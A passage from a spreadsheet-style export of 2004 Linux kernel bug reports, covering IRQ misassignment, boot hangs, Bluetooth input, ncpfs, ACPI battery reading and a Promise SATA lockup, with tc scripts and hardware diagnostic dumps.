172.16.0.0/28\033[1;39m TO\033[1;32m other LANs\033[1;39m class band - classid 1:0x22, parent 1:1" $U32 match ip src 172.16.0.0/28 match ip dst 172.16.0.0/28 flowid 1:0x22 $U32 match ip src 172.16.0.0/28 match ip dst 172.16.1.0/24 flowid 1:0x22 $U32 match ip src 172.16.0.0/28 match ip dst 80.97.163.0/28 flowid 1:0x22 $U32 match ip src 172.16.0.0/28 match ip dst 192.168.0.0/24 flowid 1:0x22 $U32 match ip src 172.16.0.0/28 match ip dst 192.168.1.0/24 flowid 1:0x22 $U32 match ip src 172.16.0.0/28 match ip dst 255.255.255.255/32 flowid 1:0x22 $TC qdisc add dev $DEV parent 1:0x22 handle 0x22: pfifo $TC class add dev $DEV parent 1:1 classid 1:0x23 htb rate 24Mbit ceil 100Mbit burst 32k quantum 1536 echo -e "| |-Add FROM\033[1;32m LAN 172.16.100.0/30\033[1;39m TO\033[1;32m other LANs\033[1;39m class band - classid 1:0x23, parent 1:1" $U32 match ip src 172.16.100.0/30 match ip dst 172.16.100.0/30 flowid 1:0x23 $U32 match ip src 172.16.100.0/30 match ip dst 255.255.255.255/32 flowid 1:0x23 $TC qdisc add dev $DEV parent 1:0x23 handle 0x23: pfifo I've tried on 2 sistems and 2 OS-es. The tc works very fine on kernel 2.6.7!!! Same script, same tc!!! TC="/home/Kitts/iproute2/iproute2/tc/tc" -&gt; is the tc version ss020116, i use this path because i do not want to install over my current iproute2 version ss040823</t>
  </si>
  <si>
    <t>Kernel does assign wrong IRQ to device driver - VIA quirk</t>
  </si>
  <si>
    <t>2.6.6 and later</t>
  </si>
  <si>
    <t>2004-08-31 08:13 UTC</t>
  </si>
  <si>
    <t>Andreas Schallenberg</t>
  </si>
  <si>
    <t>2005-07-20 11:53 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.1 Hardware Environment: HP Omibook xe4100 (a very detailed table, but german: http://members.telering.at/willhoschek/dataSheet.html) Software Environment: Problem Description: The laptop has a Rhine II network chip which is accessible under IRQ 11. However, from the kernel version 2.6.5-bk2 on it is detected on other IRQ numbers which makes the network card dead. Situations: 1) Used SuSE 9.1 with its 2.6.4 kernel: network ok 2) Updated to SuSE-2.6.7: network fails 3) Gone back to SuSE-2.6.4: network ok 4) "acpi=no" with "noapic" on SuSE-2.6.7 kernel: network fails 5) "pci=noacpi" on vanilla-2.6.8-cvs (24 Aug 2004): network fails 6) Compiled a vanilla-2.6.8.1 kernel with via-rhine.c from SuSE-2.6.4: network fails 7) Then tracked down the exact kernel and the bk version where it starts to fail. It appears to be a IRQ assignment problem since the working kernel assigns IRQ 11 to the rhine chip and 2.6.7 uses 9. Then a message for IRQ 11 appears in the logs which says that nobody cared about it. SuSE-2.6.4 --&gt; IRQ 11 --&gt; eth0 works vanilla-2.6.5 --&gt; IRQ 11 --&gt; eth0 works vanilla-2.6.5-bk2 --&gt; IRQ 11 --&gt; eth0 works vanilla-2.6.6 --&gt; IRQ 12 --&gt; eth0 failure SuSE-2.6.7 --&gt; IRQ 9 --&gt; eth0 failure vanilla-2.6.8.1 (with old via-rhine.c) --&gt; IRQ 9 -&gt; eth0 failure vanilla-2.6.8.1 (with standard via-rhine.c) --&gt; IRQ 9 -&gt; eth0 failure If I manage to build the -rc versions I will test them, too. An additional observation: At least at SuSE-2.6.4 USB works, with SuSE-2.6.7 no USB stick is being detected. Maybe an interference with the other problem? Steps to reproduce: Use any later kernel, e.g. 2.6.6 on the HP Omnibook xe4100.</t>
  </si>
  <si>
    <t>System hangs during boot</t>
  </si>
  <si>
    <t>2004-08-31 10:07 UTC</t>
  </si>
  <si>
    <t>2004-10-06 09:59 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: x305 (p4, single processor) # lspci 0000:00:00.0 Host bridge: ServerWorks GCNB-LE Host Bridge (rev 32) 0000:00:00.1 Host bridge: ServerWorks GCNB-LE Host Bridge 0000:00:03.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27) 0000:00:0f.0 ISA bridge: ServerWorks CSB5 South Bridge (rev 93) 0000:00:0f.1 IDE interface: ServerWorks CSB5 IDE Controller (rev 93) 0000:00:0f.2 USB Controller: ServerWorks OSB4/CSB5 OHCI USB Controller (rev 05) 0000:00:0f.3 Host bridge: ServerWorks CSB5 LPC bridge 0000:00:10.0 Host bridge: ServerWorks CIOB-X2 PCI-X I/O Bridge (rev 05) 0000:00:10.2 Host bridge: ServerWorks CIOB-X2 PCI-X I/O Bridge (rev 05) 0000:02:04.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet (rev 02) 0000:02:05.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5703X Gigabit Ethernet (rev 02) Software Environment: gcc 3.3.4, 2.6.9-rc1 Problem Description: During bootup, the system hangs part way through the init scripts. At first it was hanging on exim, but removing this script, it just started hanging on the next one, so it seems to be more related to timing than something in the script that was triggering a bug. Leaving it there for a LONG time, I eventually get this error: Losing too many ticks! TSC cannot be used as a timesource. &lt;4&gt; Possible reasons for this are: You're running with Speedstep, You don't have DMA enabled for your hard disk (see hdparm), Incorrect TSC synchronization on an SMP system (see dmesg). ...and then the system hangs. This looked somewhat similar to bug #2544, but the fix there does not fix this problem. This appears to be a different bug. If I boot with init=/bin/bash, it does not hang. Also, if I boot with smp turned off, it does not hang. Steps to reproduce: Boot with smp enabled on x305.</t>
  </si>
  <si>
    <t>usbhid problem with bluetooth keyboard/mouse</t>
  </si>
  <si>
    <t>2004-09-01 08:46 UTC</t>
  </si>
  <si>
    <t>Alexander Kulakov</t>
  </si>
  <si>
    <t>2004-10-18 09:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Fudjitsu-Siemens Celsius Mobile H WF2H Software Environment: kernel Problem Description: USB Bluetooth keyboard/mouse doesn`t work Steps to reproduce: the problem seems to be Fujitsu-Siemens Celsius Mobile notebook specific. That model has removable keyboard/touchpad with builting internal bluetooth port with USB interface. Some time ago I contacted USB development team and got uhci_hcd.c patch from David Brownell that partially solves the problem - usbhid driver can initialize keyboard and touchpad and, after triggering keyboard power, keyboard and touchpad start working but sometimes keyboard generates few duplicate characters and mouse pointer freezes for few seconds.</t>
  </si>
  <si>
    <t>Killing process using ncpfs makes mount unusable</t>
  </si>
  <si>
    <t>2004-09-01 13:27 UTC</t>
  </si>
  <si>
    <t>Peter Astrand</t>
  </si>
  <si>
    <t>2007-04-04 00:18 UTC</t>
  </si>
  <si>
    <t>Pierre Ossman</t>
  </si>
  <si>
    <t>Distribution: Suse 9.1 (actually all as far as I know) Hardware Environment: i386 Problem Description: When KILLing a process in the middle of a ncpfs operation, the mount becomes unusable. Subsequent file operations returns EIO. Steps to reproduce: One easy way to reproduce this is to run KDE 3.2 with the DCOP server authority file on a ncpfs. The authority file can be set with the environment variable DCOPAUTHORITY. When shutting down KDE, a process called dcopserver_shutdown will busy-looping read(), which returns EIO. After killing dcopserver_shutdown with SIGKILL, the NCP mount is in a non-working state. The ncpfs maintainer, Petr Vandrovec, has confirmed that this problems exists: &gt;&gt; * When shutting down KDE, the file system startas reporting EIO &gt;&gt; (Input/output error). It's also very un-responsive; if one process runs &gt;&gt; read() (returning EIO) in a tight loop, other processes hangs forever (well, &gt;&gt; at least &gt; 12 hours). &gt; &gt;Someone aborted process in the middle of ncpfs operation with SIGKIL. &gt;As ncp request/responses are handled in context of calling &gt;process, if you SIGKILL process after it sent request but before it &gt;received response, connection is invalidated. But it should not hang &gt;other processes which have nothing to do with ncpfs. If you run in a &gt;loop process which does some (failing) ncpfs operation, other processes &gt;which want to use that mountpoint of course blocks: Linux semaphores are not fair. If you do not want SIGKILL to abort connection, replace &gt;sigmask(SIGKILL) with sigmask(0) in fs/ncpfs/sock.c. But then you may &gt;get unkillable process in the case TCP connected server dies, or if you'll &gt;set infinite timeout for UDP/IPX servers He has also indicated that this problem might be solveable: &gt;Actually with 2.6.x fs/ncpfs/sock.c changing code to not call &gt;ncp_abort_connection() when something goes wrong should not be that &gt;hard. Only problem is that ncp_request_reply structure is allocated &gt;on caller stack, and so you must kill receiver (ncpdgram_rcv_proc/ &gt;ncptcp_rcv_proc) before you release this structure.</t>
  </si>
  <si>
    <t>Ben Castricum</t>
  </si>
  <si>
    <t>Problem reading /proc/acpi/battery/BAT0/info</t>
  </si>
  <si>
    <t>All 2.6 kernel</t>
  </si>
  <si>
    <t>2004-09-02 20:01 UTC</t>
  </si>
  <si>
    <t>2004-12-05 19:45 UTC</t>
  </si>
  <si>
    <t>&gt;&gt;Date: Sat, 28 Aug 2004 23:20:38 -0500 &gt;&gt;From: Joseph Pingenot &lt;trelane@digitasaru.net&gt; &gt;&gt;To: linux-kernel@vger.kernel.org &gt;&gt;Subject: Problem reading /proc/acpi/battery/BAT0/info &gt;&gt; &gt;&gt; &gt;&gt;Hello. &gt;&gt; &gt;&gt;I'm writing some code to read battery status, but am having problems &gt;&gt;reading &gt;&gt; /proc/acpi/battery/BAT0/info. &gt;&gt;If I read that file, I can fill *one* and *only one* buffer before I get &gt;&gt; EOF (read returns 0 bytes read on the next buffer). This is regardless &gt;&gt; of buffer length--I can use 1 or 3 or 10 bytes. First read succeeds, &gt;&gt; second read fails. Errno is 0. &gt;&gt;With the *same code*, I can read the entire file without issue. &gt;&gt;Any hints as to what's going on here? &gt;&gt;Thanks! &gt;&gt; &gt;&gt;Puzzled, &gt;&gt;-Joseph</t>
  </si>
  <si>
    <t>(sata promise) Maxtor / Promise SX2 libata hard lockup w/ two SATA disks used at same time</t>
  </si>
  <si>
    <t>2004-09-03 05:26 UTC</t>
  </si>
  <si>
    <t>Nicolas MONNET</t>
  </si>
  <si>
    <t>2006-08-31 09:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Happens on mobos Asus A7V8 and on nForce2 (ABit mobo) 2x 120G Maxtor SATA drives Maxtor (Promise chipset) card, with 2x SATA connectors. Power source is 380W Antec Tried with disks connected to an additional power source, problem still happens Software Environment: Anything Problem Description: Under heavy disk load, when both SATA disks are used at the same time (even just reading), disk access to those disks just blocks. It shortly results in a lock up. Steps to reproduce: # cat /dev/sda &gt; /dev/null # hdparm -t /dev/sdb &amp; # hdparm -t /dev/sdb &amp; Note: happened with a different mother board, different ethernet card, different (ATI) video card. I think i've covered most hardware interaction problems. -=-=-=- Could not yet look at the dmesg, as the lock up is thorough. -=--==-=- # cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(TM) XP 3200+ stepping : 0 cpu MHz : 2200.706 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 4341.76 -=-=-=-=-=-=- cat /proc/modules nvidia 4818324 12 - Live 0xf94bc000 md5 4224 1 - Live 0xf8ddf000 ipv6 255648 8 - Live 0xf8f88000 nfs 214308 3 - Live 0xf8f08000 nfsd 209312 8 - Live 0xf8e95000 exportfs 6464 1 nfsd, Live 0xf8dd3000 lockd 64328 3 nfs,nfsd, Live 0xf8e27000 sunrpc 148772 7 nfs,nfsd,lockd, Live 0xf8e3b000 it87 24040 0 - Live 0xf8dd8000 i2c_sensor 3968 1 it87, Live 0xf8d3a000 i2c_isa 2048 0 - Live 0xf8d3c000 lp 10088 0 - Live 0xf8d3f000 vmnet 31376 12 - Live 0xf8dc6000 vmmon 156236 0 - Live 0xf8deb000 snd_via82xx 29796 5 - Live 0xf8d44000 hci_usb 13696 2 - Live 0xf8a52000 usblp 12928 0 - Live 0xf8a4d000 joydev 9856 0 - Live 0xf89b1000 evdev 9600 0 - Live 0xf89b5000 usbhid 42368 0 - Live 0xf8a8b000 via_rhine 20996 0 - Live 0xf8a13000 rfcomm 39068 1 - Live 0xf8a20000 l2cap 25668 5 rfcomm, Live 0xf89e0000 bluetooth 49220 7 hci_usb,rfcomm,l2cap, Live 0xf8a3f000 bttv 151692 0 - Live 0xf8a64000 video_buf 21700 1 bttv, Live 0xf89d9000 v4l2_common 6208 1 bttv, Live 0xf8975000 btcx_risc 4744 1 bttv, Live 0xf8972000 snd_usb_audio 73760 0 - Live 0xf8a2b000 pwc 50552 0 - Live 0xf89e9000 videodev 9920 2 bttv,pwc, Live 0xf896e000 usb_storage 99216 0 - Live 0xf89f9000 ehci_hcd 29188 0 - Live 0xf89a8000 uhci_hcd 32272 0 - Live 0xf899f000 ohci_hcd 20996 0 - Live 0xf8998000 usbcore 116772 11 hci_usb,usblp,usbhid,snd_usb_audio,pwc,usb_storage,ehci_hcd,uhci_hcd,ohci_hcd, Live 0xf89bb000 snd_intel8x0 35948 0 - Live 0xf897a000 snd_ac97_codec 70020 2 snd_via82xx,snd_intel8x0, Live 0xf8985000 gameport 4736 2 snd_via82xx,snd_intel8x0, Live 0xf895d000 snd_mpu401_uart 8128 2 snd_via82xx,snd_intel8x0, Live 0xf8949000 snd_rawmidi 26276 2 snd_usb_audio,snd_mpu401_uart, Live 0xf8966000 sr_mod 17956 0 - Live 0xf894c000 st 39452 0 - Live 0xf8952000 -=-=-=-= nicathlon ~ # cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-005f : timer 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : ide1 0290-0297 : 0376-0376 : ide1 0378-037a : parport0 03c0-03df : vga+ 03f8-03ff : serial 0cf8-0cff : PCI conf1 9400-941f : 0000:00:13.1 9400-941f : uhci_hcd 9800-981f : 0000:00:13.0 9800-981f : uhci_hcd a000-a0ff : 0000:00:12.0 a000-a0ff : via-rhine a400-a40f : 0000:00:11.1 a400-a407 : ide0 a408-a40f : ide1 a800-a81f : 0000:00:10.2 a800-a81f : uhci_hcd b000-b01f : 0000:00:10.1 b000-b01f : uhci_hcd b400-b41f : 0000:00:10.0 b400-b41f : uhci_hcd b800-b8ff : 0000:00:0b.0 b800-b8ff : 8139too d000-d07f : 0000:00:0a.0 d000-d07f : sata_promise d400-d40f : 0000:00:0a.0 d400-d40f : sata_promise d800-d83f : 0000:00:0a.0 d800-d83f : sata_promise e000-e0ff : 0000:00:11.5 e000-e0ff : VIA8233 e400-e47f : motherboard e400-e403 : PM1a_EVT_BLK e404-e405 : PM1a_CNT_BLK e408-e40b : PM_TMR e420-e423 : GPE0_BLK e800-e81f : motherboard nicathlon ~ # cat /proc/iomem 00000000-0009e7ff : System RAM 0009e800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cf7ff : Video ROM 000d8000-000db3ff : Adapter ROM 000f0000-000fffff : System ROM 00100000-3fffbfff : System RAM 00100000-003939ba : Kernel code 003939bb-0049833f : Kernel data 3fffc000-3fffefff : ACPI Tables 3ffff000-3fffffff : ACPI Non-volatile Storage db000000-db0000ff : 0000:00:13.2 db000000-db0000ff : ehci_hcd db800000-db8000ff : 0000:00:12.0 db800000-db8000ff : via-rhine dc000000-dc0000ff : 0000:00:10.3 dc000000-dc0000ff : ehci_hcd dc800000-dc8000ff : 0000:00:0b.0 dc800000-dc8000ff : 8139too dd000000-dd01ffff : 0000:00:0a.0 dd000000-dd01ffff : sata_promise dd800000-dd800fff : 0000:00:0a.0 dd800000-dd800fff : sata_promise de000000-dfdfffff : PCI Bus #01 de000000-deffffff : 0000:01:00.0 de000000-deffffff : nvidia dff00000-efffffff : PCI Bus #01 e0000000-efffffff : 0000:01:00.0 f0000000-f7ffffff : 0000:00:00.0 fec00000-fec00fff : reserved fee00000-fee00fff : reserved ffff0000-ffffffff : reserved nicathlon ~ # -==-=-=-=- nicathlon ~ # lspci -vvv 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge (rev 80) Subsystem: Asustek Computer, Inc. A7V8X motherboard Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at f0000000 (32-bit, prefetchable) Capabilities: [80] AGP version 3.5 Status: RQ=32 Iso- ArqSz=0 Cal=2 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8,x@ Command: RQ=1 ArqSz=0 Cal=2 SBA+ AGP+ GART64- 64bit- FW- Rate=x8 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000e000-0000dfff Memory behind bridge: de000000-dfdfffff Prefetchable memory behind bridge: dff00000-efffffff BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0a.0 Unknown mass storage controller: Promise Technology, Inc. PDC20375 (SATA150 TX2plus) (rev 02) Subsystem: Promise Technology, Inc. PDC20375 (SATA150 TX2plus) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 (1000ns min, 4500ns max), cache line size 90 Interrupt: pin A routed to IRQ 16 Region 0: I/O ports at d800 Region 1: I/O ports at d400 [size=16] Region 2: I/O ports at d000 [size=128] Region 3: Memory at dd800000 (32-bit, non-prefetchable) [size=4K] Region 4: Memory at dd000000 (32-bit, non-prefetchable) [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Unex Technology Corp. ND010 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 19 Region 0: I/O ports at b800 Region 1: Memory at dc800000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Asustek Computer, Inc. A7V8X-X motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin A routed to IRQ 21 Region 4: I/O ports at b400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Asustek Computer, Inc. A7V8X-X motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at b000 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Asustek Computer, Inc. A7V8X-X motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin C routed to IRQ 21 Region 4: I/O ports at a800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) (prog-if 20 [EHCI]) Subsystem: Asustek Computer, Inc. A7V8X-X motherboard rev 1.01 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 10 Interrupt: pin D routed to IRQ 21 Region 0: Memory at dc000000 (32-bit, non-prefetchable) Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge Subsystem: Asustek Computer, Inc. A7V8X-X motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Asustek Computer, Inc. A7V8X-X motherboard rev. 1.01 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 255 Region 4: I/O ports at a400 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) Subsystem: Asustek Computer, Inc. A7V8X-X Motherboard Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 22 Region 0: I/O ports at e000 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 74) Subsystem: Asustek Computer, Inc. A7V8X-X Motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (750ns min, 2000ns max), cache line size 08 Interrupt: pin A routed to IRQ 23 Region 0: I/O ports at a000 Region 1: Memory at db800000 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:13.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 50) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin A routed to IRQ 18 Region 4: I/O ports at 9800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:13.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 50) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at 9400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:13.2 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 51) (prog-if 20 [EHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID): Unknown device 1234 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 10 Interrupt: pin C routed to IRQ 16 Region 0: Memory at db000000 (32-bit, non-prefetchable) Capabilities: [80] Power Management version 2 Flags: PMEClk+ DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) (prog-if 00 [VGA]) Subsystem: LeadTek Research Inc.: Unknown device 2960 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at de000000 (32-bit, non-prefetchable) [size=dffe0000] Region 1: Memory at e0000000 (32-bit, prefetchable) [size=256M] Expansion ROM at 00020000 [disabled] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=3 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3+ Rate=x4,x8 Command: RQ=32 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x8 -=-=-=-==-=-=- nicathlon ~ # cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: Maxtor 6Y120M0 Rev: YAR5 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: Maxtor 6Y120M0 Rev: YAR5 Type: Direct-Access 